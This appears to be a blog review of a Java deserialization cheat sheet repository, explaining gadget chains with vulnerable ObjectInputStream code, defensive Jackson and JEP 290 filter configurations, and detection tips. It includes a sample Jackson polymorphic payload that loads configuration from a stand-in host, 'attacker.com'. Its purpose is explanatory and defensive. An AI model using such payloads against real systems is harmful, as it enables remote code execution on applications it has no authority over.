Inside Java Deserialization Attacks: A Security Cheat Sheet Worth 3,000+ Stars
Hook
In 2015, a single vulnerability class brought down major enterprise applications from WebLogic to Jenkins. Java deserialization attacks weren't just theoretical—they were weaponized at scale, and most developers had no idea their JSON parsers were remote code execution vectors waiting to happen.
Context
Java deserialization vulnerabilities represent one of the most devastating security issues in enterprise software history. When you deserialize untrusted data in Java, you're not just reconstructing an object—you're executing arbitrary code paths determined by an attacker. The issue emerged prominently in 2015 when researchers demonstrated that common Java libraries could be chained together to achieve remote code execution through carefully crafted serialized payloads.
The GrrrDog/Java-Deserialization-Cheat-Sheet repository exists because the attack surface is massive and fragmented. It's not just native Java serialization (ObjectInputStream) that's vulnerable—JSON libraries like Jackson and Fastjson, XML processors like XStream, YAML parsers, Hessian binary protocols, and even Adobe's AMF format all have similar issues. Each library has different gadget chains (sequences of method calls that lead to code execution), different exploit techniques, and different mitigations. Security researchers and penetration testers needed a centralized reference that catalogs this knowledge across the entire JVM ecosystem. This repository serves as that living document, aggregating research from top security experts, CVE details, conference presentations, and practical exploitation guidance.
Technical Insight
The core concept behind Java deserialization attacks is the "gadget chain"—a sequence of existing classes in your application's classpath that can be chained together during deserialization to achieve arbitrary code execution. The repository documents these chains across different libraries and provides the context needed to understand why they work.
Consider a classic native Java serialization attack using Apache Commons Collections. When Java deserializes an object, it automatically invokes certain methods like readObject(). If you can control the serialized data, you can construct an object graph that triggers dangerous method calls:
// Vulnerable deserialization code (DO NOT USE): the incoming stream decides which classes get instantiated
import java.io.ObjectInputStream;
ObjectInputStream ois = new ObjectInputStream(untrustedInputStream); // no ObjectInputFilter set
Object obj = ois.readObject(); // RCE happens here, before any cast or validation of obj
// What's actually happening behind the scenes with a malicious payload:
// 1. Deserializes a specially crafted InvokerTransformer object
// 2. Triggers ChainedTransformer during readObject()
// 3. Calls Runtime.getRuntime().exec("malicious command")
The cheat sheet catalogs specific gadget chains for libraries beyond native serialization. For JSON-based attacks, it documents how libraries like Jackson with default typing enabled can be exploited. Here's a conceptual example of what a malicious Jackson payload might look like:
{
"@class": "org.springframework.context.support.ClassPathXmlApplicationContext",
"configLocation": "http://attacker.com/malicious.xml"
}
This payload exploits Jackson's polymorphic deserialization feature to instantiate arbitrary classes. The repository documents which Jackson versions are vulnerable, which annotations (like @JsonTypeInfo) enable dangerous behavior, and critically—which gadget classes need to be present in the classpath for exploitation to succeed.
The cheat sheet's real value lies in its comprehensive coverage of detection and prevention techniques. It documents how to identify vulnerable deserialization endpoints through various methods: analyzing Java serialization magic bytes (0xAC ED 00 05), detecting base64-encoded serialized objects in HTTP parameters, and using tools like Java Deserialization Scanner for Burp Suite. For protection, it details specific configurations for each library:
// Secure Jackson configuration (Jackson 2.10+ API)
import com.fasterxml.jackson.annotation.JsonTypeInfo;
import com.fasterxml.jackson.databind.ObjectMapper;
import com.fasterxml.jackson.databind.jsontype.BasicPolymorphicTypeValidator;
import com.fasterxml.jackson.databind.jsontype.PolymorphicTypeValidator;

ObjectMapper mapper = new ObjectMapper();
// Default typing is the primary vulnerability vector: keep it off (deactivateDefaultTyping replaces the deprecated disableDefaultTyping)
mapper.deactivateDefaultTyping();
// If you absolutely need polymorphism, use an explicit allowlist of your own types.
// LaissezFaireSubTypeValidator would accept every class and reintroduce the problem.
PolymorphicTypeValidator ptv = BasicPolymorphicTypeValidator.builder()
    .allowIfSubType("com.example.model.") // package prefix of your own DTOs (placeholder, adjust)
    .build();
mapper.activateDefaultTyping(ptv, ObjectMapper.DefaultTyping.NON_FINAL, JsonTypeInfo.As.PROPERTY);
// A "@class" naming a type outside the allowlist now fails with InvalidTypeIdException instead of being instantiated
The repository also documents look-ahead deserialization filters introduced in Java 9+, which allow you to inspect and block dangerous classes before full deserialization occurs:
// Java 9+ deserialization filter (JEP 290, java.io.ObjectInputFilter); patterns are checked in order
import java.io.ObjectInputFilter;
// "!" rejects, "**" covers subpackages, "java.base/*" allows every class of the java.base module,
// and the final "!*" rejects everything else, so application classes need their own allow pattern
ObjectInputFilter filter = ObjectInputFilter.Config.createFilter(
    "!org.apache.commons.collections.**;!org.springframework.**;java.base/*;!*"
);
ois.setObjectInputFilter(filter); // set before readObject(); a rejected class fails with InvalidClassException
What makes this cheat sheet particularly valuable is its organization around real-world exploitation scenarios. It links to ysoserial, the de facto tool for generating deserialization payloads, and maps which ysoserial gadget chains work against which library versions. This practical connection between theory and tooling makes it immediately actionable for security assessments.
Gotcha
The primary limitation is that this is documentation, not tooling. You'll need to pair it with actual exploitation frameworks like ysoserial or marshalsec to perform security testing. The cheat sheet tells you what vulnerabilities exist and how they conceptually work, but you still need to understand the underlying Java security concepts to apply the knowledge effectively.
Maintenance and currency present another challenge. Deserialization vulnerabilities continue to emerge—Fastjson alone has had dozens of bypass techniques discovered after initial patches. While the repository has 3,000+ stars indicating community value, the update frequency for cutting-edge vulnerabilities (particularly in rapidly-evolving libraries like Fastjson and Jackson) may lag behind security mailing lists and CVE databases. For active penetration testing, you'll want to supplement this cheat sheet with recent security advisories and proof-of-concept repositories specific to your target library versions. The repository also lacks a structured, machine-readable format (like a JSON database of vulnerabilities with version mappings), which means you can't easily integrate it into automated vulnerability scanning pipelines—it's fundamentally a human-readable reference document.
Verdict
Use if: You're conducting security assessments or penetration testing on Java applications, you're a developer working with serialization libraries and need to understand the full threat landscape, or you're implementing security controls and need comprehensive guidance on protecting multiple serialization formats. This cheat sheet is essential for anyone who needs to explain why deserialization is dangerous or defend architecture decisions around data serialization choices. Skip if: You need actual exploitation tools (go directly to ysoserial instead), you're looking for automated vulnerability scanners rather than reference material, or you're working exclusively with non-JVM technologies. Also skip if you need real-time vulnerability intelligence—for production security monitoring, you'll want dedicated threat feeds and CVE tracking systems that update more frequently than community-maintained documentation.